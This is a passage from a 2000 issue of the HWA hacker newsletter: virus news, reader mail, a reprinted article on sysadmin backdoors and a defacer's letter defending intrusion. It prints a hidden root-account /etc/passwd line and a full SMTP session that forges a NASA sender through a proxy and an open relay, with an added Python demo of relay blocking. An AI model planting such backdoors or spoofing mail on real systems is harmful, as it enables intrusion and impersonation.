   A new industry consortium thinks it has the portable answer to secure storage of music and more: a secure digital memory card. Microsoft signed on Wednesday. Look out, Sony Memory Stick.

++ Net Tax May Get the Heave-Ho (Politics Wednesday)
   http://www.wired.com/news/politics/0,1283,34075,00.html?tw=wn20000203
   It's a matter of changing one sentence in existing legislation. But if Congress approves, the threat of Internet taxation could vanish forever. Or at least for Washington's idea of forever. Declan McCullagh reports from Washington.

++ Class-Action Suit Calls on AOL (Politics Wednesday)
   http://www.wired.com/news/politics/0,1283,34063,00.html?tw=wn20000203
   A lawsuit alleges America Online's newest software disconnects users from competing online accounts. The filing requests $8 billion in damages for version 5.0 users.

++ RealNetworks Helps Pay Piper (Technology Wednesday)
   http://www.wired.com/news/technology/0,1282,34026,00.html?tw=wn20000203
   The Net's streaming media giant adds technology from AudioSoft to facilitate royalty payments to copyright holders. The system will count streams and send the data to the collecting agency. By Christopher Jones.
++ Virtual Training for Real Jobs (Culture Wednesday)
   http://www.wired.com/news/culture/0,1284,33897,00.html?tw=wn20000203
   Technology may be the cornerstone of the new economy, but people lacking skills are being shut out of the market. One Texas program is trying to get them into the game. Katie Dean reports from Austin, Texas.

++ But, How to Pronounce Dot EU? (Politics Wednesday)
   http://www.wired.com/news/politics/0,1283,34045,00.html?tw=wn20000203
   The European Commission, wanting a piece of the dot com pie, launches an initiative to give businesses on the other side of the pond a uniform suffix.

-=- Security Portal News Shorts -=-

++ Trend Micro Virus Alerts: TROJ_FELIZ and W97M_ARMAGID.A - a Windows executable and Word macro virus respectively; both are low risk viruses, not believed to be widespread.

++ ComputerWorld: Y2K gives some admins a security education - The threat of online assaults had IT staffs on guard, but midnight came and went without any serious security problems cropping up, according to experts monitoring systems.

++ ZDNet: Script virus looks to ring in new year - The first virus to get its own press release in the year 2000 appears to be little more than a nuisance. Meanwhile, pirate-killer Trojan.Kill also quiet.

++ Jan 1, 2000

++ Symantec: PWSteal.Trojan Virus - PWSteal.Trojan is a trojan which attempts to steal login names and passwords. These passwords are often sent to an anonymous email address.

++ CNN: CA warns of Y2K-triggered virus - CA said the "Trojan.Kill_Inst98" virus will delete all the files on an infected PC's C: drive when the system clock rolls over to Jan. 1, 2000.

++ Dec 31, 1999

++ NAI: Zelu Virus - This is an MS-DOS executable which can destroy data on the hard drive. The original filename as received to AVERT is Y2K.EXE and is 24,944 bytes in size. If this file is run, it simulates checking the system for Y2K compliancy.
   It is not, however, doing any such thing - it is trashing files on the local system, rendering the machine inoperable. Not believed to be widespread.

++ Y2K Status Update - no news is good news

++ Sophos Virus Alert: WM97/Chantal-B - WM97/Chantal-B is a Word macro virus which drops a batch file virus and a Visual Basic script trojan horse. On the 31st of any month the virus displays the Microsoft Office assistant with the message: "Y2K is Coming Soon". If the year is 2000 the virus attempts to delete all files in the current directory and in the root directory of the C: drive.

++ Sophos Virus Alert: WM97/BackHand-A - If the date is Friday the 13th the virus password protects the document with the password "Trim(Two)". Then, if the year is 2000, it resets the computer's date to 1/1/1980.

++ CERT: Estimate of the Threat Posed by Y2K-Related Viruses - About a dozen Y2K-related viruses have been reported, but they are not widespread. Moreover, because viruses have to be executed to operate and because most people will not be at their keyboards as the date rolls over, the likelihood of a significant virus event is low. As people return to work next week, the virus risk may increase somewhat for all types of viruses, but there is no reason to expect a major outbreak.

++ NAI Virus listing: ExploreZip.C or Minizip III - This is another variant of the original W32/ExploreZip.worm distributed earlier in 1999. This version is different in that it is "localized" with Spanish error messages; however it will function on English Windows systems. This edition was compressed using another compression tool.
   Not currently rated as a high risk threat.

++ Dec 30, 1999

++ ZDNet: Apple's OS 9 patch brings new problems - Although many users were impressed by Apple's quick reaction this week to the discovery of a potential security flaw in Mac OS 9, those users who have applied the new OT Tuner 1.0 patch are reporting loss of all network connectivity or crashes during startup. Apple says patched machines simply need to be restarted.

++ Sun Security Bulletin 192: CDE and OpenWindows - Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, 2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4, 5.3), and SunOS 4.1.4, and 4.1.3_U1 which relate to various vulnerabilities in CDE and OpenWindows.

++ Sun Security Bulletin 191: sadmind - Sun announces the release of patches for Solaris 7, 2.6, 2.5.1, 2.5, 2.4, and 2.3 (SunOS 5.7, 5.6, 5.5.1, 5.5, 5.4 and 5.3), which relate to a vulnerability with sadmind.

Thanks to myself for providing the info from my wired news feed and others from whatever sources, Zym0t1c and also to Spikeman for sending in past entries.... - Ed

@HWA

01.2 MAILBAG - email and posts from the message board worthy of a read
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

========================================================================

The message board is DEAD; it was an experiment that failed. Perhaps I'll revive a board when I can run some good board software on our own host. Don't be shy with your email; we do get mail, just not much of it directed to other readers/the general readership. I'd really like to see a 'readers mail' section. Send in questions on security, hacking, IDS, general tech questions or observations etc. Hell, we've even printed poetry in the past when we thought it was good enough to share.. - Ed

========================================================================

Seen on security focus:

To: Security Jobs
Subject: Virus coder wanted
Date: Thu Jan 27 2000 00:18:44
Author: Drissel, James W.
Message-ID:

Computer Sciences Corporation in San Antonio, TX is looking for a good virus coder. Applicants must be willing to work at Kelly AFB in San Antonio. Other exploit experience is helpful.

Send Resumes/questions to james.drissel@cmet.af.mil

-=-

From:
To:
Sent: Wednesday, January 05, 2000 1:02 AM
Subject: Just some comments

Hello staff of HWA,

Just thought I would tell u guys that u r doin a pimp ass job and if it's alright I would like to put a link up on my webpage to this interesting and informative site. Mail me back plez.

Pyr0-phreak@geeks404.com
www.crosswinds.net/~pyr0phreak

-=-

From: Andrew Nutter-Upham
To:
Sent: Sunday, January 02, 2000 9:42 PM
Subject: about your site.

I love the newsletter, read every edition. But your site sucks. Now I don't blame you, a lot of people have problems with good site design. I do web design as a part time job, and I'd like (just to be nice, for money of course.) to redo the site, if that's ok with you. I could leach the site down, but I think it'd be easier if you could just zip it up and send it to me. If you like my revisions feel free to keep them. If not, that's ok too, I just thought that I'd put in the offer. Think it over.

Thanks for listening.
-andy

It sure does suck; it's getting pretty shoddy and outdated looking, a tad ragged around the edges. I've done some minor patch-up mods to make things better but don't have time to work on it in a major way. Perhaps we can get something going here... - Ed

-=-

From: Lascarmaster
To:
Sent: Monday, January 24, 2000 1:58 AM
Subject: [ AD! ]

Hello CRUCIPHUX,

Hello from France. My site is a French hacker portal with some good links and news for hackers (in French I prefer the word lascar). By the way, if you could place this ad on your next hwa.hax0r digest, it could be very nice. Try my site at http://lascars.cjb.net

______________________________________________________________
French Hackers' Portal / Le Portail Des Lascars Francophones
Links and News of interest / Liens et news pour lascars. ;-)
--------------------------------------------------------------
->->->->->->->->-> http://lascars.cjb.net <-<-<-<-<-<-<-<-<-
______________________________________________________________

The Lascars portal is http://Lascars.cjb.net

Lascarmaster
mailto:Lascars@iquebec.com

______________________________________________________________________________
If your email were on iFrance you could listen to this message by phone! http://www.ifrance.com : don't leave your emails far from you any more ... free on iFrance: emails (20 MB, POP, FAX), calendar, personal site

-=-

From: Dragos Ruiu
To:
Sent: Tuesday, January 25, 2000 9:50 PM
Subject: kyxspam: IMxploits in the news

(First reported in Salon huh.?... Bay Area tunnel vision is an interesting phenomenon. Has anyone made the definitive IM vulnerability and exploit page yet? As in I'M owned. --dr :-)

Hack Takes Aim at AOL Clients
Wired News Report
5:30 p.m. 24.Jan.2000 PST

A security breach on AOL Instant Messenger put the privacy of AIM users at risk on Monday, according to a published report.

The breach, first reported in Salon, allows subscribers to link new AOL accounts to AIM names that already exist. Holes in the sign-up process allow people to get around the password protection of the AIM accounts.

"We are aware of it and are deploying security measures to defeat it," said Rich D'Amato, a spokesman for AOL.

AOL's online service is used to change passwords, so hackers are easily able to open new accounts using the existing AIM user's name.
People who subscribe to AOL are not affected by the breach. People who use instant messaging software (AIM) outside of AOL are.

D'Amato called the security breach an example of "hacker behavior that crosses the line into illegal action."

"Our intention is to investigate this and when we identify an individual or groups of individuals, we intend to bring this to the attention of the proper law enforcement authorities," D'Amato said.

He declined to speculate on when the problem will be fixed or how many users were affected, although he characterized it as "a very small number."

David Cassel, who edits the AOL Watch mailing list, claimed the security hole was easily preventable. It was simply a matter of someone thinking through the sign-on process.

"AOL left a gaping hole in the way they implemented it," Cassel wrote in an email. "Those who happened to have an AOL account weren't vulnerable, but everyone else was. To promote such an easily cracked software really violates any reasonable expectation of security. In that sense, all AIM users were affected."

"AOL is a marketing company, not a technology company," Cassel wrote. "They mass-promoted a software that's vulnerable to easy attacks."

--
kyx.net we're from the future - home of kanga-foo!

-=-

From: Dragos Ruiu
To:
Sent: Tuesday, January 25, 2000 10:32 PM
Subject: kyxspam: hacking for politics.

http://news.cnet.com/news/0-1005-200-1531134.html?tag=st.ne.ron.lthd.1005-200-1531134

Hackers attack Japanese government sites
By Reuters
Special to CNET News.com
January 25, 2000, 11:40 a.m. PT

TOKYO--Japanese officials suffered an embarrassment today when hackers penetrated two government Web sites, leaving a message in one of them criticizing the Japanese government's position on the 1937 Nanjing Massacre.
Computer systems at Japan's Management and Coordination Agency were raided yesterday, and its home page was replaced with derogatory messages insulting the Japanese in the first-ever hacking of the country's government computer system.

The hackers left a message on the Web site in Chinese blasting the Japanese government for refusing to acknowledge that the Nanjing Massacre took place, media reports said.

Jiji news agency said it had deciphered the message, which originally came in garbled, to read: "The Chinese people must speak up to protest the Japanese government for refusing to acknowledge the historical misdeed of the 1937 Nanjing Massacre."

Hundreds of thousands of civilians were massacred by Imperial Army troops during the 1937-38 occupation of the central Chinese city.

A meeting by ultrarightist Japanese in Osaka last weekend to whitewash the incident, also called the Rape of Nanking, has whipped up new anger in China, where hundreds marched through the streets of Nanjing to denounce the conference.

The Chinese government lodged protests about the gathering. But the Japanese government, which acknowledges that the incident was no fabrication as some ultrarightists claim, failed to bar the group from holding the weekend meeting.

A similar hacking incident occurred on Japan's Science and Technology Agency's home page. Agency officials declined to give details of the messages but said the home page was also replaced with a direct access switch to adult magazine Web sites.

Top government spokesman Mikio Aoki said the government would launch an extensive investigation into the hacking incidents, including possible help from Washington, which is more advanced in dealing with hackers.

"The government must take all necessary measures including seeking help from the United States," Aoki said at a news conference.

Officials said it was not immediately clear whether the same hacker was responsible for the two separate cases of infiltration.
Story Copyright © 2000 Reuters Limited. All rights reserved.

--
kyx.net we're from the future - home of kanga-foo!

-=-

From: Dragos Ruiu
To:
Sent: Wednesday, January 26, 2000 5:15 PM
Subject: kyxspam: who watches the watchmen?

(tip o'de hat to rfp's site {wiretrip.net} that had this article link. Luv dem skins... --dr)

http://www.sunworld.com/sunworldonline/swol-01-2000/swol-01-security.html

Who gets your trust?
Security breaches can come from those you least suspect

Summary
Systems administrators have extraordinary access to all the data on corporate systems. What can be done to ensure that your administrators will not betray that trust?

WIZARD'S GUIDE TO SECURITY
By Carole Fennelly

In the business world you will often hear the statement "We don't hire hackers." When pressed for a reason, the speaker usually reveals a fear that a "hacker" will install a back door in the system. Time and time again, however, I have seen back doors installed by employees or security professionals whose integrity is never questioned. When confronted, they usually say it's no big deal. After all, they have the root password. They just wanted to set up a root account with a different environment. That's not hacking, right?

Wrong. Their intention did not matter -- the security of the system has been bypassed.

This article discusses how administrative privileges can be abused and suggests some methods for countering that abuse. It is not meant to imply that every administrator abuses privileges or has malicious intent -- just that you shouldn't assume anything.

What is a back door?

Quite simply, a back door is a method for gaining access to a system that bypasses the usual security mechanisms. (Has everyone seen WarGames?) Programmers and administrators love to stick back doors in so they can access the system quickly to fix problems. Usually, they rely on obscurity to provide security.
Think of approaching a building with an elaborate security system that does bio scans, background checks, the works. Someone who doesn't have time to go through all that might just rig up a back exit so they can step out for a smoke -- and then hope no one finds out about it.

In computer systems, a back door can be installed on a terminal server to provide direct access to the console remotely, saving the administrator a trip to the office. It can also be a program set up to invoke system privileges from a nonprivileged account.

A simple back door is an account set up in the /etc/passwd file that looks like any other userid. The difference is that this userid doesn't have to su to root (and it won't show up in /var/adm/sulog) -- it already is root:

    auser:x:0:101:Average User :/home/auser:/bin/ksh

If you don't see it, look again at the third field (userid) and compare it to the root account. They are the same (0). If you are restricting direct root logins to the console only (via /etc/default/login), then this account will have the same limitation. The difference is that if someone does su to this account, it will not be apparent in /var/adm/sulog that it is root. Also, a change to the root password will not affect the account. Even if the person who installed the account intends no harm, he or she has left a security hole.

It is also pretty common for an administrator to abuse the /.rhosts file by putting in desktop systems "temporarily." These have a way of becoming permanent. Back doors can also be set up in subtler ways through SUID 0 programs (which set the userid to root).

Usually, the motivation for setting up back doors is one of expediency. The administrator is just trying to get a job done as quickly as possible. Problems arise later when either (1) he leaves under normal circumstances and the hole remains or (2) he leaves under bad circumstances and wants revenge.
Proprietary data

A manager may also be reluctant to hire "hackers" for fear that they may divulge proprietary information or take copies of proprietary data.

Several years ago, I was consulting at a company when a new administrator joined the group. In an effort to ingratiate himself with the team, he confided that he had kept the backup tapes from his old job (a competitor) and that they had some "really cool tools." It so happened that a consultant with my own business worked at the competitor's site. A scan of the tape revealed the proprietary software that the administrator had been working on, which eventually sold for a significant amount of money. While the admin probably did not intend to steal the software, his actions could have left his new employer facing a large lawsuit -- all for the sake of a few shell scripts.

In this particular case, no one believed that the administrator had any ulterior motives. I wonder if people would have felt that way if he had been a "known hacker"?

System monitoring

Administrators are supposed to monitor system logs. How else can problems be investigated? But there is a difference between monitoring logs for a legitimate reason and monitoring them to satisfy prurient curiosity. Using the system log files to monitor a particular user's behavior for no good reason is an abuse of privileges.

What is a good reason? Your manager asks you to monitor specific logs. Or maybe you notice suspicious activities, in which case you should inform the management. Or, more commonly, a user complains about a problem and you are trying to solve it.

What is a bad reason? A user ticks you off and you want to see how he is spending company time. Or a user has a prominent position in the company and you want to know what kinds of Websites she goes to.

Countermeasures

You can take some actions to ensure the integrity of privileged users, but none of them carries any guarantee.
Background checks

You can have an investigative agency run a background check on an individual and you can require drug tests. These tell you only about past behavior (if the individual has been caught).

The state of New Jersey (where I live) has adopted a law commonly referred to as Megan's Law (see Resources). The law mandates that a community be notified of any convicted sex offender living in the community. On the surface, it sounds like a great idea and a way to protect children from predators. As a parent, I am particularly sensitive to crimes against children. I received a Megan's Law notification this past year about a convicted sex offender who moved into town. It did not change a thing for me. My feeling is that every child molester has to have had a first time and that in any case not all molesters have been identified. Therefore, I take appropriate precautions with my children, regardless of who has moved to the area.

In the technical field, hackers are considered the molesters. (Yes, I know all about the politically correct terms cracker, defacer, etc., but the common term these days is hacker.) How do you know if someone is a "hacker"? Some people try to refine the term to mean "someone who has been convicted of a computer crime." But let's say, for example, that you attend Defcon, the hackers' conference, and encounter an intelligent job seeker with bright blue hair and funky clothes. Would you hire him? Chances are that you would at least scrutinize his credentials and make sure your contract spelled out all details of the work to be performed and the legal repercussions for any violations.

What if the same person showed up for an interview with the blue dye rinsed out and in a nice pressed suit? Be honest: would you perform the same background checks regardless of a person's appearance?

Technical measures

Some technical software packages can limit or control superuser privileges.
I recommend using them to prevent the inadvertent abuse of superuser privilege. Unfortunately, knowledgeable administrators and programmers with privileged access will be able to circumvent these measures if they really want to.

sudo

The freely available sudo package provides more granular control over the system by restricting which privileged commands can be run on a user basis. See Resources for the Sudo main page, which has a more complete description.

Tripwire

Tripwire is a file integrity package that, following the policy determined by the administrator, reports any changes made to critical files. Tripwire was originally developed at Purdue University by Gene Kim under the direction of Eugene Spafford. I plan to evaluate the merits of the commercial version of Tripwire in a future column.

Tripwire is a good way for an administrator to tell whether the system files or permissions have been modified. What can be done, however, if the senior administrator who monitors the system has malicious intent?

Professionalism

The best defense against the abuse of administrator privileges is to rely on a certain level of professionalism. The medical Hippocratic oath includes the mandate Do No Harm. While there is no such professional oath for systems administrators, you can establish guidelines for acceptable behavior.

During the mid-1980s, I worked as an administrator in a computer center at a large telecommunications research facility. We had a code of ethics that a user had to sign before an account could be installed. We also had a code of ethics for privileged users that included additional restrictions, such as:

- No SUID 0 (set userid to root) programs will be installed without the consent, in writing, of the senior administrator.
- All users' email is to be considered private and confidential and may not be read by anyone other than the intended recipient.
- Users' files may not be modified or read except in the case of a predetermined problem or security investigation.
  Be prepared to justify.
- Privileged users are often entrusted with sensitive information, such as an employee termination, before other employees. This information is to be kept confidential.
- The root passwords are changed monthly and are to be distributed by the senior administrator only. The passwords must be kept in a safe location, such as your wallet. If the password is lost, notify the senior administrator or your manager immediately.
- Keystroke monitoring of user activities is strictly prohibited without senior management approval, in writing.
- All administrative procedures and tools are to be considered proprietary information and are the property of the computer center.
- Tape archives may not be removed from the facility without written approval.

Discretion

A code of ethics for privileged users should not be considered a punitive device, but rather a statement about the integrity of the person who signs it.

At one point during my years in the computer center, the secretary to the president of the company came to me with a printer problem. As I was assisting her, she became upset when she realized that the test job she had sent to the printer was highly confidential. I was able to reassure her that all administrators were bound by a code of ethics and would be terminated for violations. (Besides, I wasn't really reading it, I was just looking for garbage characters!)

Professionals must establish a certain level of trust. This is especially important for those privy to sensitive information regarding terminations or investigations.

Final thoughts

Would I hire someone who showed up for an interview with blue hair, body piercings, and a name like 3v1l HaK0rZ? No. Not because he might install a back door, but because he was ignorant about what was acceptable on Wall Street. As for the back doors? More are installed by well-groomed "professionals" in suits than by "hackers." Anyone with the required skills can be either a "security consultant" or a "hacker."
The only difference is the label. Disclaimer: The information and software in this article are provided as-is and should be used with caution. Each environment is unique, and readers are cautioned to investigate, with their companies, the feasibility of using the information and software in this article. No warranties, implied or actual, are granted for any use of the information and software in this article, and neither the author nor the publisher is responsible for any damages, either consequential or incidental, with respect to the use of the information and software contained herein. s About the author Carole Fennelly is a partner in Wizard's Keys Corporation, a company specializing in computer security consulting. She has been a Unix system administrator for almost 20 years on various platforms and of late has focused on sendmail configurations. Carole provides security consultation to several financial institutions in the New York City area. -- kyx.net we're from the future - home of kanga-foo! -=- 02.0 From the editor. ~~~~~~~~~~~~~~~~ _____ _ _ _ _ | ____|__| (_) |_ ___ _ __( )__ | _| / _` | | __/ _ \| '__|/ __| | |__| (_| | | || (_) | | \__ \ ___|_____\__,_|_|\__\___/|_| |___/ / ___| ___ __ _ _ __ | |__ _____ __ \___ \ / _ \ / _` | '_ \| '_ \ / _ \ \/ / ___) | (_) | (_| | |_) | |_) | (_) > < |____/ \___/ \__,_| .__/|_.__/ \___/_/\_\ |_| #include #include #include main() { printf ("Read commented source!\n\n"); /* * Yes we've wavered from our weekly release schedule, sorry * about that, i've been indulging in other projects requiring * more of my time (network IDS related etc) but you will find * pretty much full coverage of the time period Jan 16th to Feb * 12th or so included in this issue. * * I've rearranged stuff a little, i've moved some of the fodder * that i'm sure was annoying some people and definately at * at least one (grin) to the END of the newsletter, into the * appendices where it should probably have been in the first * place. 
So if you're looking for the gov and mil sites that * have scoured our site or want to check the FAQ or our source * or resource lists etc, they have all been moved to the back * so now you can more or less 'dive in' to the news material * and content without paging thru stuff you may have already * seen a million times. * * Also did a slight modification/clean up of the website, its * going to be redone but meanwhile i've made it a little less * cumbersome and easier to navigate. Also added a toy or two * want a user@hax0r-news.zzn.com mail address? I knew you did * (heh) well now you can, just follow the link and away you * go to yet another web based mail account...sorry appears to * be no forwarding. * * This will include alot of HNN rehashed material, i'm working * on automating the retreival of certain news sources for time * saving in creating these issues, since we have access to * other sources of info that don't get explored as often as * I'd like, also keeping up with exploits is not so difficult * now that packetstorm no longer has the contact base it once * did. If you can suggest sites that get 0-day (grin) or current * exploit code or the sites of the coders themselves, please * send in the url/list info etc so we can keep everyone up to * date. * * I shall finally be asking some help from people, I can no * longer do this by myself to my satisfaction, so I hope to * enlist some eager beavers with time to kill on this project * rather than let release dates drift further and further * apart. * * * Things are a bit messy and not necessarily in chronological * order, I don't like it but thats the way it turned out, I * really need to spend more time on this to get it organized * more neatly and make it more accessible, comments welcome. * * We need more submissions!, if you submit to security NG's or * mailing lists about exploits or security concerns that you * think may be of interest to our readers, consider CC: a copy * to me for inclusion here. 
I try and cover a broad spectrum * (perhaps too broad) of security/hacker related material and * as such a little help with material would be most appreciated. * * mucho props out to Zym0t1c who is contributing more and more * to the zine lately, thanks dude! * * Cruci * * cruciphux@dok.org * Preffered chat method: IRC Efnet in #HWA.hax0r.news * */ printf ("EoF.\n"); } Snailmail: HWA NEWS P.O BOX 44118 370 MAIN ST. NORTH BRAMPTON, ONTARIO CANADA L6V 4H5 Anonymous email: telnet (wingate ip) (see our proxies list) Wingate>0.0.0.0 Trying 0.0.0.0... Connected to target.host.edu Escape character is '^]'. 220 target.host.edu ESMTP Sendmail 8.9.3/8.9.3; Sun, 6 Feb 2000 17:21:00 -0500 (EST) HELO bogus.com 250 target.host.edu Hello ~ereet@target.host.edu [ 0.0.0.0 ], pleased to meet you MAIL FROM: admin@nasa.gov 250 admin@nasa.gov... Sender ok RCPT TO: cruciphux@dok.org 250 cruciphux@dok.org... Recipient ok DATA Secret cool infoz . QUIT If you got that far everything is probably ok, otherwise you might see 550 cruciphux@dok.org... Relaying denied or 550 admin@nasa.gov... Domain must exist etc. * This won't work on a server with up to date rule sets denying relaying and your attempts will be logged so we don't suggest you actually use this method to reach us, its probably also illegal (theft of service) so, don't do it. ;-) -=- Congrats, thanks, articles, news submissions and kudos to us at the main address: hwa@press.usmc.net complaints and all nastygrams and mai*lbombs can go to /dev/nul nukes, synfloods, trinoo and tribe or ol' papasmurfs to 127.0.0.1, private mail to cruciphux@dok.org danke. C*:. 
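The note above says the session fails against a server with up-to-date relay rules. As an added illustration (not code from HWA, Sendmail or any project named here), this is a small model of the check a correctly configured MTA applies from the server's side of that dialogue: recipients in its own domains are accepted, relaying to anyone else is allowed only from its own networks, and everything else gets the "550 ... Relaying denied" reply, with an optional stand-in for the DNS check behind "Domain must exist". The hostname target.host.edu and the 0.0.0.0 client address are taken from the transcript; the 10.0.0.0/8 relay network, the known-domains set and all reply wording other than the two 550 lines are constructed for the demo.

```python
import ipaddress
from dataclasses import dataclass
from typing import List, Optional, Set


@dataclass
class RelayPolicy:
    """Relay rules of the kind an MTA enforces per recipient.
    Constructed for this demo, not read from a real sendmail.cf."""
    local_domains: Set[str]                        # delivered locally, always accepted
    relay_networks: List[ipaddress.IPv4Network]    # clients allowed to relay outward
    known_domains: Optional[Set[str]] = None       # stand-in for DNS; None = no check

    def sender_ok(self, sender: str) -> bool:
        if self.known_domains is None:
            return True
        return sender.rsplit("@", 1)[-1].lower() in self.known_domains

    def recipient_ok(self, client_ip: str, rcpt: str) -> bool:
        if rcpt.rsplit("@", 1)[-1].lower() in self.local_domains:
            return True                            # local delivery, not relaying
        ip = ipaddress.ip_address(client_ip)
        return any(ip in net for net in self.relay_networks)


class SmtpSession:
    """Server side of one SMTP dialogue: feed() takes a client line and
    returns the reply a server applying `policy` would send."""

    def __init__(self, policy: RelayPolicy, client_ip: str,
                 hostname: str = "target.host.edu"):   # hostname from the zine transcript
        self.policy, self.client_ip, self.hostname = policy, client_ip, hostname
        self.helo = "unknown"
        self.sender: Optional[str] = None
        self.rcpts: List[str] = []
        self.log: List[str] = []                   # what would land in the maillog

    @staticmethod
    def _addr(arg: str) -> str:
        # "FROM: <a@b>" or "TO: a@b" -> "a@b"
        return arg.split(":", 1)[-1].strip().strip("<>")

    def feed(self, line: str) -> str:
        verb, _, arg = line.strip().partition(" ")
        handler = getattr(self, "do_" + verb.upper(), None)
        reply = handler(arg.strip()) if handler else "500 Command unrecognized"
        self.log.append(f"{self.client_ip} {line.strip()} -> {reply}")
        return reply

    def do_HELO(self, arg: str) -> str:
        self.helo = arg
        return f"250 {self.hostname} Hello {arg} [{self.client_ip}], pleased to meet you"

    def do_MAIL(self, arg: str) -> str:
        addr = self._addr(arg)
        if not self.policy.sender_ok(addr):
            return f"550 {addr}... Domain must exist"
        self.sender = addr
        return f"250 {addr}... Sender ok"

    def do_RCPT(self, arg: str) -> str:
        addr = self._addr(arg)
        if self.sender is None:
            return "503 Need MAIL before RCPT"
        if not self.policy.recipient_ok(self.client_ip, addr):
            return f"550 {addr}... Relaying denied"
        self.rcpts.append(addr)
        return f"250 {addr}... Recipient ok"

    def do_QUIT(self, arg: str) -> str:
        return f"221 {self.hostname} closing connection"

    def received_header(self) -> str:
        # The HELO name is whatever the client claimed; the bracketed address
        # is the real peer, so a proxy's address is what gets recorded.
        return f"Received: from {self.helo} ([{self.client_ip}]) by {self.hostname}"


def run_session(policy: RelayPolicy, client_ip: str, commands: List[str]) -> List[str]:
    """Replies, in order, to each client command."""
    session = SmtpSession(policy, client_ip)
    return [session.feed(c) for c in commands]


# Constructed demo policy: the host accepts mail for itself and lets only
# clients on its own 10.0.0.0/8 relay outward; dok.org is not a local domain.
DEMO_POLICY = RelayPolicy(local_domains={"target.host.edu"},
                          relay_networks=[ipaddress.ip_network("10.0.0.0/8")])

# The client side of the zine's dialogue. 0.0.0.0 stands in for the
# proxy's address exactly as the transcript leaves it.
ZINE_DIALOGUE = ["HELO bogus.com", "MAIL FROM: admin@nasa.gov",
                 "RCPT TO: cruciphux@dok.org", "QUIT"]

if __name__ == "__main__":
    for cmd, reply in zip(ZINE_DIALOGUE, run_session(DEMO_POLICY, "0.0.0.0", ZINE_DIALOGUE)):
        print(f"C: {cmd}\nS: {reply}")
```

Run against the zine's dialogue from an outside address the third reply is the "Relaying denied" line; the same dialogue from inside 10.0.0.0/8, or to a recipient in the server's own domain, is accepted. The received_header() and log entries show why the "your attempts will be logged" remark holds even through a proxy: the HELO name is free text, but the peer address the server records is the proxy's, which is where an investigation starts.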
-= start =--= start =--= start =--= start =--= start =--= start =--= start

                           Content Start

-= start =--= start =--= start =--= start =--= start =--= start =--=

03.0 Slash, Croatian cracker, speaks out
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The following is from one of the last defacements that Slash has done; he
has since renounced defacing and is starting a new security group called
b0f (Buffer Overflow). We'll keep you posted as this develops. - Ed

Defaced by slash [ 2.1.2000 ]

Original site here
(http://www.attrition.org/mirror/attrition/2000/01/08/www.badjura-petri.com/index-old.html)

www.badjura-petri.com

- I got some interesting mail in the last few days that I want to share
with You. The first one is from a Security Consultant David Hove, who
works for a company named "RISCmanagment Inc." (www.riscman.com), and
this is what he wrote to me in his mail :

------

Numb Nuts,

Your judgments lay upon broken young souls who know no better. Let it be!
Hackers will hack regardless of holes previously exploited. If the sys adm
does not fix their holes this is not the issue. Hacking for fame is not
the issue. You yourself mailed your hack in for recognition did you not.
STOP THE HYPOCRISY AND SIMPLY HACK. Who the hell are U to dictate what
should be placed on a defaced website? I personally work the other side
of the fence specializing in keeping you out but thoroughly enjoy watching
you and others like you go about your daily routine. Exploiting port 80,
buffer overflows, running your little scripts, etc. Fuck ethics! The
harder you try to hack the more aware we become as admins. For those
admins who do not keep up Fuckem!

David Hove
Security Consultant CCSA/CCSE
RISCmanagement Inc.
www.riscman.com

-------

Dear Mr. David, your email made me very sad because I realized that
people don't get the message I'm trying to say. Hacking previously hacked
sites is considered lame, and yes, hacking for fame is the issue. Hackers
nowadays hack only to get media attention. In my country a 16 year old
Back Orifice user was raided for "hacking" a computer of a Croatian
politician. The media made a national hero out of him. In the interview
he said that he could hack into a bank with just two of his friends and a
good computer. Now, people who read that newspaper bought the story, but
people who know young Denis via IRC can confirm that he is a complete
idiot and a lamer. His parents are so proud of him, not knowing that
anyone can "hack" using Back Orifice.

About me mailing my hack to attrition. Yes, I did mail the hack to
attrition, you know why !? I deface to spread the message out. I
personally think if I just deface the site that people won't notice it.
So I report it to attrition and they put a mirror of the site I defaced
so other people can view it too. I don't do it for the fame. I could hack
under a different name every time, but this is my style. I don't go
bragging on IRC "I hacked this..", "I hacked that..". I don't have to
prove my skillz to anyone. People can respect me or hate me. I sincerely
doubt that defacing a site will make me look better in front of my
friends. Almost anyone can find himself a remote exploit and run it
against the server. But not anyone can secure a Unix server, program or
even make html. For me defacing is just expressing my opinion on stuff,
nothing more.

About 'fuck the ethics' thing. Mr. David, the ethics are here to prevent
a major chaos. Without ethics people would just go around and delete
anything they run into. I suggest every hacker stick to the ethics as
close as he can, hell, that's why they were written. I know people forget
about them, but there are always people like me to remind hackers about
the ethics. That's the balance. People don't stick to them, they leave
stupid messages like "I 0wn3 j00". I tell You people, that's bad. Can't
You just write something. Anything, just not these stupid irritating
messages.

Ok, we started another discussion here. "Who the hell are U to dictate
what should be placed on a defaced website?" - You say. Well, You're
right. I'm nobody. I can't dictate what should be placed on a defaced
website. But I can suggest people not to do it. I just suggested it, I
didn't dictate or order it.

"The harder you try to hack the more aware we become as admins." - Aware
?! If I deface Your site ten times, and don't tell You how I got in, You
become more aware !? I damage Your company for 10.000 $ by defacing it,
because people say: "How can they secure my server when they can't even
secure their own." And nobody wants Your service anymore. Don't get me
wrong. I'm sure You're a very good and experienced administrator, but
nothing is secure enough that hackers can't break it. That's what we
devoted Our lives to, penetrating systems.

I enjoy hacking. That is really something unique. People through ages
have always wanted to do something that's forbidden or illegal. Just
remind Yourself of Adam & Eve, and the Heaven garden. Eve had to eat that
apple although God gave them everything they needed, and just forbade
them to eat apples from that tree. Hacking is illegal in many countries.
You could get a worse sentence for hacking than for murdering someone. I
don't really care if I get raided. Hacking is my crime. A crime out of
passion. Respect me or hate me, the choice is Yours.

- Peace out, slash

- Shoutouts - p4riah, LogError, zanith, v00d00, PHC, THC, attrition.org,
net-security.org, ex1t, sAs72, Cruciphux, HWA.hax0r.news, BHZ, SiRiUs,
sLina, kLick_Mi, Emptyhead, mosthated, pr1sm, fuqraq, airWalk,
[Princev], zeroeffect, and the whole BLN.

- Peace to my man whitecee, keep Your head up. Peace to everyone who gave
support via email or IRC. I wish You a happy and a bug-free New Year.
Links...

- Attrition.org: Keep up the good work fellows
- HelpNet Security: The best news site on the net
- Black Lava Network: BLN for life !!!

Copyright © slash
Penetrating systems since 1998

@HWA

